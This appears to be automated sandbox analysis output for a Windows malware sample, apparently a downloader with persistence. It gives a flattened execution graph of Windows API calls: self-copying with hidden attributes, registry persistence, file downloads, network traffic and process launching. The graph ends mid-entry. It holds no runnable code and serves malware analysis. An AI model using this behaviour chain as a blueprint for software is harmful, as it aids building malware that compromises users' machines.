                                                                                Execution Coverage:0.9%
                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                Signature Coverage:16.6%
                                                                                Total number of Nodes:1471
                                                                                Total number of Limit Nodes:8
                                                                                execution_graph 4374 407500 Sleep CreateMutexA GetLastError 4375 407536 ExitProcess 4374->4375 4376 40753e 6 API calls 4374->4376 4377 4075e3 4376->4377 4378 4078a9 Sleep RegOpenKeyExW 4376->4378 4454 40ebe0 GetLocaleInfoA strcmp 4377->4454 4379 407902 RegOpenKeyExW 4378->4379 4380 4078d6 RegSetValueExA RegCloseKey 4378->4380 4382 407924 RegSetValueExA RegCloseKey 4379->4382 4383 407955 RegOpenKeyExW 4379->4383 4380->4379 4385 4079fa RegOpenKeyExW 4382->4385 4386 407977 RegCreateKeyExW RegCloseKey 4383->4386 4387 4079ac RegOpenKeyExW 4383->4387 4391 407a1c RegSetValueExA RegCloseKey 4385->4391 4392 407a4d RegOpenKeyExW 4385->4392 4386->4387 4387->4385 4390 4079ce RegSetValueExA RegCloseKey 4387->4390 4388 4075f0 ExitProcess 4389 4075f8 ExpandEnvironmentStringsW wsprintfW CopyFileW 4393 40764c SetFileAttributesW RegOpenKeyExW 4389->4393 4394 4076de Sleep wsprintfW CopyFileW 4389->4394 4390->4385 4397 407b49 RegOpenKeyExW 4391->4397 4398 407aa4 RegOpenKeyExW 4392->4398 4399 407a6f RegCreateKeyExW RegCloseKey 4392->4399 4393->4394 4400 40767d wcslen RegSetValueExW 4393->4400 4395 407726 SetFileAttributesW RegOpenKeyExW 4394->4395 4396 4077b8 Sleep ExpandEnvironmentStringsW wsprintfW CopyFileW 4394->4396 4395->4396 4403 407757 wcslen RegSetValueExW 4395->4403 4396->4378 4404 407817 SetFileAttributesW RegOpenKeyExW 4396->4404 4401 407b97 RegOpenKeyExW 4397->4401 4402 407b6b RegSetValueExA RegCloseKey 4397->4402 4405 407ac6 RegCreateKeyExW RegCloseKey 4398->4405 4406 407afb RegOpenKeyExW 4398->4406 4399->4398 4400->4394 4407 4076b2 RegCloseKey 4400->4407 4408 407be5 RegOpenKeyExA 4401->4408 4409 407bb9 RegSetValueExA RegCloseKey 4401->4409 4402->4401 4403->4396 4410 40778c RegCloseKey 4403->4410 4404->4378 4411 407848 wcslen RegSetValueExW 4404->4411 4405->4406 4406->4397 4412 407b1d RegSetValueExA RegCloseKey 4406->4412 4456 40ee30 memset memset CreateProcessW 4407->4456 4414 407cf1 RegOpenKeyExA 4408->4414 4415 407c0b 8 API calls 4408->4415 4409->4408 4416 40ee30 6 API calls 4410->4416 4411->4378 4417 40787d RegCloseKey 4411->4417 4412->4397 4420 407d17 8 API calls 4414->4420 4421 407dfd Sleep 4414->4421 4415->4414 4422 4077a5 4416->4422 4423 40ee30 6 API calls 4417->4423 4419 4076d6 ExitProcess 4420->4421 4462 40cc80 4421->4462 4422->4396 4424 4077b0 ExitProcess 4422->4424 4426 407896 4423->4426 4426->4378 4428 4078a1 ExitProcess 4426->4428 4429 407e18 9 API calls 4465 405b60 InitializeCriticalSection CreateFileW 4429->4465 5290 405820 4429->5290 5299 406b50 Sleep GetModuleFileNameW 4429->5299 5313 4073b0 4429->5313 4431 407f84 4436 407ecd CreateEventA 4497 40c3b0 4436->4497 4445 40d610 17 API calls 4446 407f2d 4445->4446 4447 40d610 17 API calls 4446->4447 4448 407f49 4447->4448 4449 40d610 17 API calls 4448->4449 4450 407f65 4449->4450 4542 40d780 GetCurrentThread GetThreadPriority GetCurrentThread SetThreadPriority 4450->4542 4452 407f75 4551 40d8c0 4452->4551 4455 4075e8 4454->4455 4455->4388 4455->4389 4457 40eea1 ShellExecuteW 4456->4457 4458 40ee92 Sleep 4456->4458 4460 40eed6 4457->4460 4461 40eec7 Sleep 4457->4461 4459 4076cb 4458->4459 4459->4394 4459->4419 4460->4459 4461->4459 4560 40cc50 4462->4560 4466 405c85 4465->4466 4467 405b98 CreateFileMappingW 4465->4467 4479 40daf0 CoInitializeEx 4466->4479 4468 405bb9 MapViewOfFile 4467->4468 4469 405c7b CloseHandle 4467->4469 4470 405c71 CloseHandle 4468->4470 4471 405bd8 GetFileSize 4468->4471 4469->4466 4470->4469 4473 405bed 4471->4473 4472 405c67 UnmapViewOfFile 4472->4470 4473->4472 4475 405c2c 4473->4475 4478 405bfc 4473->4478 4689 40ccd0 4473->4689 4696 405c90 4473->4696 4476 40a660 _invalid_parameter 3 API calls 4475->4476 4476->4478 4478->4472 5004 40dbc0 socket 4479->5004 4481 407ec8 4492 406f70 CoInitializeEx SysAllocString 4481->4492 4482 40db98 5048 40a780 4482->5048 4485 40db5a 5029 40af30 htons 4485->5029 4486 40db10 4486->4481 4486->4482 4486->4485 5014 40de30 4486->5014 4491 40e920 24 API calls 4491->4482 4493 406f92 4492->4493 4494 406fa8 CoUninitialize 4492->4494 5193 406fc0 4493->5193 4494->4436 5202 40c370 4497->5202 4500 40c370 3 API calls 4501 40c3ce 4500->4501 4502 40c370 3 API calls 4501->4502 4503 40c3de 4502->4503 4504 40c370 3 API calls 4503->4504 4505 407ee5 4504->4505 4506 40d5e0 4505->4506 4507 40a240 7 API calls 4506->4507 4508 40d5eb 4507->4508 4509 407eef 4508->4509 4510 40d5f7 InitializeCriticalSection 4508->4510 4511 40b770 InitializeCriticalSection 4509->4511 4510->4509 4513 40b78a 4511->4513 4512 40b7b9 CreateFileW 4514 40b7e0 CreateFileMappingW 4512->4514 4515 40b8a2 4512->4515 4513->4512 5209 40d950 NtQuerySystemTime RtlTimeToSecondsSince1980 4513->5209 5210 40b350 4513->5210 4518 40b801 MapViewOfFile 4514->4518 4519 40b898 CloseHandle 4514->4519 5258 40b010 EnterCriticalSection 4515->5258 4521 40b81c GetFileSize 4518->4521 4522 40b88e CloseHandle 4518->4522 4519->4515 4520 40b8a7 4524 40d610 17 API calls 4520->4524 4528 40b83b 4521->4528 4522->4519 4525 407ef9 4524->4525 4530 40d610 4525->4530 4526 40b884 UnmapViewOfFile 4526->4522 4528->4526 4529 40b350 32 API calls 4528->4529 5257 40d950 NtQuerySystemTime RtlTimeToSecondsSince1980 4528->5257 4529->4528 4531 40d627 EnterCriticalSection 4530->4531 4532 407f12 4530->4532 5285 40d700 4531->5285 4532->4445 4535 40d6eb LeaveCriticalSection 4535->4532 4536 40a490 9 API calls 4537 40d669 4536->4537 4537->4535 4538 40d67b CreateThread 4537->4538 4538->4535 4539 40d69e 4538->4539 4540 40d6c2 GetCurrentProcess GetCurrentProcess DuplicateHandle 4539->4540 4541 40d6e4 4539->4541 4540->4541 4541->4535 4543 40d7b6 InterlockedExchangeAdd 4542->4543 4544 40d899 GetCurrentThread SetThreadPriority 4542->4544 4543->4544 4548 40d7d0 4543->4548 4544->4452 4545 40d7e9 EnterCriticalSection 4545->4548 4546 40d857 LeaveCriticalSection 4546->4548 4550 40d86e 4546->4550 4547 40d833 WaitForSingleObject 4547->4548 4548->4544 4548->4545 4548->4546 4548->4547 4549 40d88c Sleep 4548->4549 4548->4550 4549->4548 4550->4544 4552 40d8cc EnterCriticalSection 4551->4552 4559 40d942 4551->4559 4553 40d8e8 4552->4553 4554 40d910 LeaveCriticalSection DeleteCriticalSection 4553->4554 4555 40d8fb CloseHandle 4553->4555 4556 40a660 _invalid_parameter 3 API calls 4554->4556 4555->4553 4557 40d936 4556->4557 4558 40a660 _invalid_parameter 3 API calls 4557->4558 4558->4559 4559->4431 4563 40c8a0 4560->4563 4564 40c8be 4563->4564 4566 40c8d3 4563->4566 4569 40c900 4564->4569 4567 407e0d 4566->4567 4595 40ca80 4566->4595 4567->4429 4567->4431 4570 40c9b2 4569->4570 4571 40c929 4569->4571 4573 40a240 7 API calls 4570->4573 4590 40c9aa 4570->4590 4571->4590 4629 40a240 4571->4629 4575 40c9d8 4573->4575 4577 402420 7 API calls 4575->4577 4575->4590 4579 40ca05 4577->4579 4581 4024e0 10 API calls 4579->4581 4583 40ca1f 4581->4583 4582 40c97f 4584 402420 7 API calls 4582->4584 4586 402420 7 API calls 4583->4586 4585 40c990 4584->4585 4587 4024e0 10 API calls 4585->4587 4588 40ca30 4586->4588 4587->4590 4589 4024e0 10 API calls 4588->4589 4591 40ca4a 4589->4591 4590->4567 4592 402420 7 API calls 4591->4592 4593 40ca5b 4592->4593 4594 4024e0 10 API calls 4593->4594 4594->4590 4596 40caa9 4595->4596 4597 40cb5a 4595->4597 4598 40a240 7 API calls 4596->4598 4623 40cb52 4596->4623 4600 40a240 7 API calls 4597->4600 4597->4623 4599 40cabf 4598->4599 4602 402420 7 API calls 4599->4602 4599->4623 4601 40cb7e 4600->4601 4604 402420 7 API calls 4601->4604 4601->4623 4603 40cae3 4602->4603 4605 40a240 7 API calls 4603->4605 4606 40cba2 4604->4606 4607 40caf2 4605->4607 4608 40a240 7 API calls 4606->4608 4609 4024e0 10 API calls 4607->4609 4610 40cbb1 4608->4610 4611 40cb1b 4609->4611 4612 4024e0 10 API calls 4610->4612 4614 40a660 _invalid_parameter 3 API calls 4611->4614 4613 40cbda 4612->4613 4615 40a660 _invalid_parameter 3 API calls 4613->4615 4616 40cb27 4614->4616 4618 40cbe6 4615->4618 4617 402420 7 API calls 4616->4617 4619 40cb38 4617->4619 4620 402420 7 API calls 4618->4620 4621 4024e0 10 API calls 4619->4621 4622 40cbf7 4620->4622 4621->4623 4624 4024e0 10 API calls 4622->4624 4623->4567 4625 40cc11 4624->4625 4626 402420 7 API calls 4625->4626 4627 40cc22 4626->4627 4628 4024e0 10 API calls 4627->4628 4628->4623 4640 40a260 4629->4640 4632 402420 4661 40a450 4632->4661 4637 4024e0 4668 402540 4637->4668 4639 4024ff _invalid_parameter 4639->4582 4649 40a300 GetCurrentProcessId 4640->4649 4642 40a26b 4643 40a277 __aligned_recalloc_base 4642->4643 4650 40a320 4642->4650 4645 40a24e 4643->4645 4646 40a292 HeapAlloc 4643->4646 4645->4590 4645->4632 4646->4645 4647 40a2b9 __aligned_recalloc_base 4646->4647 4647->4645 4648 40a2d4 memset 4647->4648 4648->4645 4649->4642 4658 40a300 GetCurrentProcessId 4650->4658 4652 40a329 4653 40a346 HeapCreate 4652->4653 4659 40a390 GetProcessHeaps 4652->4659 4655 40a360 HeapSetInformation GetCurrentProcessId 4653->4655 4656 40a387 4653->4656 4655->4656 4656->4643 4658->4652 4660 40a33c 4659->4660 4660->4653 4660->4656 4662 40a260 __aligned_recalloc_base 7 API calls 4661->4662 4663 40242b 4662->4663 4664 402820 4663->4664 4665 40282a 4664->4665 4666 40a450 __aligned_recalloc_base 7 API calls 4665->4666 4667 402438 4666->4667 4667->4637 4669 40258e 4668->4669 4671 402551 4668->4671 4670 40a450 __aligned_recalloc_base 7 API calls 4669->4670 4669->4671 4674 4025b2 _invalid_parameter 4670->4674 4671->4639 4672 4025e2 memcpy 4673 402606 _invalid_parameter 4672->4673 4675 40a660 _invalid_parameter 3 API calls 4673->4675 4674->4672 4678 40a660 4674->4678 4675->4671 4685 40a300 GetCurrentProcessId 4678->4685 4680 40a66b 4681 4025df 4680->4681 4686 40a5a0 4680->4686 4681->4672 4684 40a687 HeapFree 4684->4681 4685->4680 4687 40a5d0 HeapValidate 4686->4687 4688 40a5f0 4686->4688 4687->4688 4688->4681 4688->4684 4706 40a6d0 4689->4706 4692 40cd11 4692->4473 4695 40a660 _invalid_parameter 3 API calls 4695->4692 4919 40a490 4696->4919 4699 405cca memcpy 4700 40a6d0 8 API calls 4699->4700 4701 405d01 4700->4701 4929 40c640 4701->4929 4704 405d88 4704->4473 4707 40a6fd 4706->4707 4708 40a450 __aligned_recalloc_base 7 API calls 4707->4708 4709 40a712 4707->4709 4710 40a714 memcpy 4707->4710 4708->4707 4709->4692 4711 40c1e0 4709->4711 4710->4707 4719 40c1ea 4711->4719 4714 40c221 memcmp 4714->4719 4715 40c248 4716 40a660 _invalid_parameter 3 API calls 4715->4716 4718 40c209 4716->4718 4717 40a660 _invalid_parameter 3 API calls 4717->4719 4718->4692 4718->4695 4719->4714 4719->4715 4719->4717 4719->4718 4720 40c6d0 4719->4720 4734 407fa0 4719->4734 4721 40c6df __aligned_recalloc_base 4720->4721 4722 40a450 __aligned_recalloc_base 7 API calls 4721->4722 4724 40c6e9 4721->4724 4723 40c778 4722->4723 4723->4724 4725 402420 7 API calls 4723->4725 4724->4719 4726 40c78d 4725->4726 4727 402420 7 API calls 4726->4727 4728 40c795 4727->4728 4730 40c7ed __aligned_recalloc_base 4728->4730 4737 40c840 4728->4737 4742 402470 4730->4742 4733 402470 3 API calls 4733->4724 4850 40a1c0 4734->4850 4738 4024e0 10 API calls 4737->4738 4739 40c854 4738->4739 4748 4026f0 4739->4748 4741 40c86c 4741->4728 4743 402484 _invalid_parameter 4742->4743 4745 4024ce 4742->4745 4746 40a660 _invalid_parameter 3 API calls 4743->4746 4747 4024ac 4743->4747 4744 40a660 _invalid_parameter 3 API calls 4744->4745 4745->4733 4746->4747 4747->4744 4751 402710 4748->4751 4750 40270a 4750->4741 4752 402724 4751->4752 4753 402540 __aligned_recalloc_base 10 API calls 4752->4753 4754 40276d 4753->4754 4755 402540 __aligned_recalloc_base 10 API calls 4754->4755 4756 40277d 4755->4756 4757 402540 __aligned_recalloc_base 10 API calls 4756->4757 4758 40278d 4757->4758 4759 402540 __aligned_recalloc_base 10 API calls 4758->4759 4760 40279d 4759->4760 4761 4027a6 4760->4761 4762 4027cf 4760->4762 4766 403e20 4761->4766 4783 403df0 4762->4783 4765 4027c7 _invalid_parameter 4765->4750 4767 402820 _invalid_parameter 7 API calls 4766->4767 4768 403e37 4767->4768 4769 402820 _invalid_parameter 7 API calls 4768->4769 4770 403e46 4769->4770 4771 402820 _invalid_parameter 7 API calls 4770->4771 4772 403e55 4771->4772 4773 402820 _invalid_parameter 7 API calls 4772->4773 4782 403e64 _invalid_parameter 4773->4782 4775 40400f _invalid_parameter 4776 402850 _invalid_parameter 3 API calls 4775->4776 4777 404035 _invalid_parameter 4775->4777 4776->4775 4778 402850 _invalid_parameter 3 API calls 4777->4778 4779 40405b _invalid_parameter 4777->4779 4778->4777 4780 402850 _invalid_parameter 3 API calls 4779->4780 4781 404081 4779->4781 4780->4779 4781->4765 4782->4775 4786 402850 4782->4786 4790 404090 4783->4790 4785 403e0c 4785->4765 4787 402866 4786->4787 4788 40285b 4786->4788 4787->4782 4789 40a660 _invalid_parameter 3 API calls 4788->4789 4789->4787 4791 4040a6 _invalid_parameter 4790->4791 4792 4040b8 _invalid_parameter 4791->4792 4793 4040dd 4791->4793 4795 404103 4791->4795 4792->4785 4820 403ca0 4793->4820 4796 40413d 4795->4796 4797 40415e 4795->4797 4830 404680 4796->4830 4799 402820 _invalid_parameter 7 API calls 4797->4799 4800 40416f 4799->4800 4801 402820 _invalid_parameter 7 API calls 4800->4801 4802 40417e 4801->4802 4803 402820 _invalid_parameter 7 API calls 4802->4803 4804 40418d 4803->4804 4805 402820 _invalid_parameter 7 API calls 4804->4805 4806 40419c 4805->4806 4843 403d70 4806->4843 4808 4041ca _invalid_parameter 4809 402820 _invalid_parameter 7 API calls 4808->4809 4811 404284 _invalid_parameter 4808->4811 4809->4808 4810 402850 _invalid_parameter 3 API calls 4810->4811 4811->4810 4812 4045a3 _invalid_parameter 4811->4812 4813 402850 _invalid_parameter 3 API calls 4812->4813 4814 4045c9 _invalid_parameter 4812->4814 4813->4812 4815 402850 _invalid_parameter 3 API calls 4814->4815 4816 4045ef _invalid_parameter 4814->4816 4815->4814 4817 402850 _invalid_parameter 3 API calls 4816->4817 4818 404615 _invalid_parameter 4816->4818 4817->4816 4818->4792 4819 402850 _invalid_parameter 3 API calls 4818->4819 4819->4818 4821 403cae 4820->4821 4822 402820 _invalid_parameter 7 API calls 4821->4822 4823 403ccb 4822->4823 4824 402820 _invalid_parameter 7 API calls 4823->4824 4825 403cda _invalid_parameter 4824->4825 4826 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4825->4826 4827 403d3a _invalid_parameter 4825->4827 4826->4825 4828 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4827->4828 4829 403d60 4827->4829 4828->4827 4829->4792 4831 402820 _invalid_parameter 7 API calls 4830->4831 4832 404697 4831->4832 4833 402820 _invalid_parameter 7 API calls 4832->4833 4834 4046a6 4833->4834 4835 402820 _invalid_parameter 7 API calls 4834->4835 4837 4046b5 _invalid_parameter 4835->4837 4836 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4836->4837 4837->4836 4838 404841 _invalid_parameter 4837->4838 4839 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4838->4839 4841 404867 _invalid_parameter 4838->4841 4839->4838 4840 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4840->4841 4841->4840 4842 40488d 4841->4842 4842->4792 4844 402820 _invalid_parameter 7 API calls 4843->4844 4845 403d7f _invalid_parameter 4844->4845 4846 403ca0 _invalid_parameter 9 API calls 4845->4846 4848 403db8 _invalid_parameter 4846->4848 4847 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4847->4848 4848->4847 4849 403de3 4848->4849 4849->4808 4851 40a1d2 4850->4851 4854 40a120 4851->4854 4855 40a450 __aligned_recalloc_base 7 API calls 4854->4855 4862 40a130 4855->4862 4858 40a660 _invalid_parameter 3 API calls 4860 407fbf 4858->4860 4859 40a16c 4859->4858 4860->4719 4862->4859 4862->4860 4863 409650 4862->4863 4870 409c40 4862->4870 4875 40a010 4862->4875 4864 409663 4863->4864 4869 409659 4863->4869 4865 4096a6 memset 4864->4865 4864->4869 4866 4096c7 4865->4866 4865->4869 4867 4096cd memcpy 4866->4867 4866->4869 4883 409420 4867->4883 4869->4862 4871 409c4d 4870->4871 4872 409c57 4870->4872 4871->4862 4872->4871 4873 409d4f memcpy 4872->4873 4888 409970 4872->4888 4873->4872 4877 40a026 4875->4877 4881 40a01c 4875->4881 4876 409970 64 API calls 4878 40a0a7 4876->4878 4877->4876 4877->4881 4879 409420 6 API calls 4878->4879 4878->4881 4880 40a0c6 4879->4880 4880->4881 4882 40a0db memcpy 4880->4882 4881->4862 4882->4881 4884 40946e 4883->4884 4886 40942e 4883->4886 4884->4869 4886->4884 4887 409360 6 API calls 4886->4887 4887->4886 4889 409980 4888->4889 4890 40998a 4888->4890 4889->4872 4890->4889 4898 4097b0 4890->4898 4893 409ac8 memcpy 4893->4889 4895 409ae7 memcpy 4896 409c11 4895->4896 4897 409970 62 API calls 4896->4897 4897->4889 4899 4097bd 4898->4899 4901 4097c7 4898->4901 4899->4889 4899->4893 4899->4895 4900 409850 4909 409110 4900->4909 4901->4899 4901->4900 4903 409855 4901->4903 4904 409838 4901->4904 4905 409420 6 API calls 4903->4905 4907 409420 6 API calls 4904->4907 4905->4900 4907->4900 4908 4098fc memset 4908->4899 4910 409129 4909->4910 4918 40911f 4909->4918 4911 408fe0 9 API calls 4910->4911 4910->4918 4912 409222 4911->4912 4913 40a450 __aligned_recalloc_base 7 API calls 4912->4913 4914 409271 4913->4914 4915 408e50 46 API calls 4914->4915 4914->4918 4916 40929e 4915->4916 4917 40a660 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4916->4917 4917->4918 4918->4899 4918->4908 4938 40a300 GetCurrentProcessId 4919->4938 4921 40a49b 4922 40a320 __aligned_recalloc_base 5 API calls 4921->4922 4923 40a4a7 __aligned_recalloc_base 4921->4923 4922->4923 4924 40a550 HeapAlloc 4923->4924 4925 40a51a HeapReAlloc 4923->4925 4926 40a5a0 _invalid_parameter HeapValidate 4923->4926 4927 40a660 _invalid_parameter 3 API calls 4923->4927 4928 405cb5 4923->4928 4924->4923 4925->4923 4926->4923 4927->4923 4928->4699 4928->4704 4932 40c64b 4929->4932 4930 40a450 __aligned_recalloc_base 7 API calls 4930->4932 4931 405d4d 4931->4704 4933 4072a0 4931->4933 4932->4930 4932->4931 4934 40a450 __aligned_recalloc_base 7 API calls 4933->4934 4935 4072b0 4934->4935 4936 4072f7 4935->4936 4937 4072bc memcpy CreateThread CloseHandle 4935->4937 4936->4704 4937->4936 4939 407300 4937->4939 4938->4921 4940 407371 4939->4940 4941 407311 4939->4941 4942 40737c DeleteUrlCacheEntry 4940->4942 4945 40736f 4940->4945 4944 407320 StrChrA 4941->4944 4941->4945 4948 407344 DeleteUrlCacheEntry 4941->4948 4946 40ef90 64 API calls 4942->4946 4943 40a660 _invalid_parameter 3 API calls 4947 4073a6 4943->4947 4944->4941 4944->4948 4945->4943 4946->4945 4951 40ef90 9 API calls 4948->4951 4952 40f053 InternetOpenUrlW 4951->4952 4953 40f1be InternetCloseHandle Sleep 4951->4953 4954 40f1b1 InternetCloseHandle 4952->4954 4955 40f082 CreateFileW 4952->4955 4956 40f1e5 7 API calls 4953->4956 4957 407359 Sleep 4953->4957 4954->4953 4958 40f0b1 InternetReadFile 4955->4958 4959 40f1a4 CloseHandle 4955->4959 4956->4957 4960 40f274 wsprintfW DeleteFileW Sleep 4956->4960 4957->4941 4961 40f104 CloseHandle wsprintfW DeleteFileW Sleep 4958->4961 4962 40f0d5 4958->4962 4959->4954 4963 40ec70 21 API calls 4960->4963 4979 40ec70 CreateFileW 4961->4979 4962->4961 4964 40f0de WriteFile 4962->4964 4966 40f2b4 4963->4966 4964->4958 4968 40f2f2 DeleteFileW 4966->4968 4969 40f2be Sleep 4966->4969 4968->4957 4972 40ee30 6 API calls 4969->4972 4970 40f197 DeleteFileW 4970->4959 4971 40f15b Sleep 4973 40ee30 6 API calls 4971->4973 4974 40f2d5 4972->4974 4975 40f172 4973->4975 4974->4957 4977 40f2e8 ExitProcess 4974->4977 4976 40f18e 4975->4976 4978 40f186 ExitProcess 4975->4978 4976->4959 4980 40ecb5 CreateFileMappingW 4979->4980 4981 40edca 4979->4981 4982 40edc0 CloseHandle 4980->4982 4983 40ecd6 MapViewOfFile 4980->4983 4984 40edd0 CreateFileW 4981->4984 4993 40ee21 4981->4993 4982->4981 4985 40ecf5 GetFileSize 4983->4985 4986 40edb6 CloseHandle 4983->4986 4987 40edf2 WriteFile CloseHandle 4984->4987 4988 40ee18 4984->4988 4989 40ed11 4985->4989 4990 40edac UnmapViewOfFile 4985->4990 4986->4982 4987->4988 4991 40a660 _invalid_parameter 3 API calls 4988->4991 5001 40cca0 4989->5001 4990->4986 4991->4993 4993->4970 4993->4971 4995 40c640 7 API calls 4996 40ed60 4995->4996 4996->4990 4997 40ed7d memcmp 4996->4997 4997->4990 4998 40ed99 4997->4998 4999 40a660 _invalid_parameter 3 API calls 4998->4999 5000 40eda2 4999->5000 5000->4990 5002 40c6d0 10 API calls 5001->5002 5003 40ccc4 5002->5003 5003->4990 5003->4995 5005 40dbed htons inet_addr setsockopt 5004->5005 5010 40dd1e 5004->5010 5006 40af30 8 API calls 5005->5006 5007 40dc66 bind lstrlenA sendto ioctlsocket 5006->5007 5013 40dcbb 5007->5013 5010->4486 5011 40dce2 5061 40aff0 shutdown closesocket 5011->5061 5012 40a490 9 API calls 5012->5013 5013->5011 5013->5012 5052 40dd40 5013->5052 5068 40e070 memset InternetCrackUrlA InternetOpenA 5014->5068 5017 40df4e 5017->4486 5019 40a660 _invalid_parameter 3 API calls 5019->5017 5023 40df1b 5023->5019 5025 40df11 SysFreeString 5025->5023 5175 40aef0 inet_addr 5029->5175 5032 40afdd 5037 40e920 5032->5037 5033 40af8c connect 5034 40afa0 getsockname 5033->5034 5035 40afd4 5033->5035 5034->5035 5178 40aff0 shutdown closesocket 5035->5178 5179 40aed0 inet_ntoa 5037->5179 5039 40e936 5040 40cea0 11 API calls 5039->5040 5041 40e955 5040->5041 5047 40db7c 5041->5047 5180 40e9a0 memset InternetCrackUrlA InternetOpenA 5041->5180 5044 40e98c 5046 40a660 _invalid_parameter 3 API calls 5044->5046 5045 40a660 _invalid_parameter 3 API calls 5045->5044 5046->5047 5047->4491 5051 40a784 5048->5051 5049 40a78a 5049->4481 5050 40a660 GetCurrentProcessId HeapValidate HeapFree _invalid_parameter 5050->5051 5051->5049 5051->5050 5060 40dd5c 5052->5060 5053 40de24 5053->5013 5054 40dd78 recvfrom 5055 40dda6 StrCmpNIA 5054->5055 5056 40dd99 Sleep 5054->5056 5057 40ddc5 StrStrIA 5055->5057 5055->5060 5056->5060 5058 40dde6 StrChrA 5057->5058 5057->5060 5062 40cd50 5058->5062 5060->5053 5060->5054 5061->5010 5063 40cd5b 5062->5063 5064 40cd61 lstrlenA 5063->5064 5065 40a450 __aligned_recalloc_base 7 API calls 5063->5065 5066 40cd74 5063->5066 5067 40cd90 memcpy 5063->5067 5064->5063 5064->5066 5065->5063 5066->5060 5067->5063 5067->5066 5069 40e111 InternetConnectA 5068->5069 5070 40de4a 5068->5070 5071 40e27a InternetCloseHandle 5069->5071 5072 40e14a HttpOpenRequestA 5069->5072 5070->5017 5081 40df60 5070->5081 5071->5070 5073 40e180 HttpSendRequestA 5072->5073 5074 40e26d InternetCloseHandle 5072->5074 5075 40e260 InternetCloseHandle 5073->5075 5077 40e19d 5073->5077 5074->5071 5075->5074 5076 40e1be InternetReadFile 5076->5077 5078 40e1eb 5076->5078 5077->5076 5077->5078 5079 40a490 9 API calls 5077->5079 5078->5075 5080 40e206 memcpy 5079->5080 5080->5077 5110 405630 5081->5110 5084 40de63 5084->5023 5091 40e8d0 5084->5091 5085 40df8a SysAllocString 5086 40dfa1 CoCreateInstance 5085->5086 5087 40e057 5085->5087 5089 40e04d SysFreeString 5086->5089 5090 40dfc6 5086->5090 5088 40a660 _invalid_parameter 3 API calls 5087->5088 5088->5084 5089->5087 5090->5089 5127 40e420 5091->5127 5094 40e2a0 5132 40e6f0 5094->5132 5099 40e850 6 API calls 5100 40e2f7 5099->5100 5106 40dee2 5100->5106 5149 40e510 5100->5149 5103 40e32f 5103->5106 5154 40e3c0 5103->5154 5104 40e510 6 API calls 5104->5103 5106->5025 5107 40cea0 5106->5107 5170 40ce10 5107->5170 5114 40563d 5110->5114 5111 405643 lstrlenA 5112 405656 5111->5112 5111->5114 5112->5084 5112->5085 5114->5111 5114->5112 5115 40a450 __aligned_recalloc_base 7 API calls 5114->5115 5117 40a660 _invalid_parameter 3 API calls 5114->5117 5118 4055d0 5114->5118 5122 405580 5114->5122 5115->5114 5117->5114 5119 4055e7 MultiByteToWideChar 5118->5119 5120 4055da lstrlenA 5118->5120 5121 40560c 5119->5121 5120->5119 5121->5114 5123 40558b 5122->5123 5124 405591 lstrlenA 5123->5124 5125 4055d0 2 API calls 5123->5125 5126 4055c7 5123->5126 5124->5123 5125->5123 5126->5114 5130 40e446 5127->5130 5128 40decd 5128->5023 5128->5094 5129 40e4c3 lstrcmpiW 5129->5130 5131 40e4db SysFreeString 5129->5131 5130->5128 5130->5129 5130->5131 5131->5130 5133 40e716 5132->5133 5134 40e2bb 5133->5134 5135 40e7a3 lstrcmpiW 5133->5135 5134->5106 5144 40e850 5134->5144 5136 40e823 SysFreeString 5135->5136 5137 40e7b6 5135->5137 5136->5134 5138 40e3c0 2 API calls 5137->5138 5140 40e7c4 5138->5140 5139 40e815 5139->5136 5140->5136 5140->5139 5141 40e7f3 lstrcmpiW 5140->5141 5142 40e805 5141->5142 5143 40e80b SysFreeString 5141->5143 5142->5143 5143->5139 5145 40e3c0 2 API calls 5144->5145 5147 40e86b 5145->5147 5146 40e2d9 5146->5099 5146->5106 5147->5146 5148 40e6f0 6 API calls 5147->5148 5148->5146 5150 40e3c0 2 API calls 5149->5150 5152 40e52b 5150->5152 5151 40e315 5151->5103 5151->5104 5152->5151 5158 40e590 5152->5158 5155 40e3e6 5154->5155 5156 40e3fd 5155->5156 5157 40e420 2 API calls 5155->5157 5156->5106 5157->5156 5160 40e5b6 5158->5160 5159 40e6cd 5159->5151 5160->5159 5161 40e643 lstrcmpiW 5160->5161 5162 40e6c3 SysFreeString 5161->5162 5163 40e656 5161->5163 5162->5159 5164 40e3c0 2 API calls 5163->5164 5166 40e664 5164->5166 5165 40e6b5 5165->5162 5166->5162 5166->5165 5167 40e693 lstrcmpiW 5166->5167 5168 40e6a5 5167->5168 5169 40e6ab SysFreeString 5167->5169 5168->5169 5169->5165 5174 40ce1d 5170->5174 5171 40cdc0 _vscprintf wvsprintfA 5171->5174 5172 40ce38 SysFreeString 5172->5025 5173 40a490 9 API calls 5173->5174 5174->5171 5174->5172 5174->5173 5176 40af1c socket 5175->5176 5177 40af09 gethostbyname 5175->5177 5176->5032 5176->5033 5177->5176 5178->5032 5179->5039 5181 40e977 5180->5181 5182 40ea44 InternetConnectA 5180->5182 5181->5044 5181->5045 5183 40ebc4 InternetCloseHandle 5182->5183 5184 40ea7d HttpOpenRequestA 5182->5184 5183->5181 5185 40eab3 HttpAddRequestHeadersA HttpSendRequestA 5184->5185 5186 40ebb7 InternetCloseHandle 5184->5186 5187 40ebaa InternetCloseHandle 5185->5187 5190 40eafd 5185->5190 5186->5183 5187->5186 5188 40eb14 InternetReadFile 5189 40eb41 5188->5189 5188->5190 5189->5187 5190->5188 5190->5189 5191 40a490 9 API calls 5190->5191 5192 40eb5c memcpy 5191->5192 5192->5190 5199 406ff7 5193->5199 5194 407250 CoCreateInstance 5194->5199 5195 4071cb 5197 4071d4 SysFreeString 5195->5197 5198 406f9b SysFreeString 5195->5198 5196 40a660 _invalid_parameter 3 API calls 5196->5195 5197->5198 5198->4494 5199->5194 5200 407146 SysAllocString 5199->5200 5201 407012 5199->5201 5200->5199 5200->5201 5201->5195 5201->5196 5203 40c37a 5202->5203 5204 40c37e 5202->5204 5203->4500 5206 40c330 CryptAcquireContextW 5204->5206 5207 40c36b 5206->5207 5208 40c34d CryptGenRandom CryptReleaseContext 5206->5208 5207->5203 5208->5207 5209->4513 5261 40b280 gethostname 5210->5261 5213 40b369 5213->4513 5215 40b37c 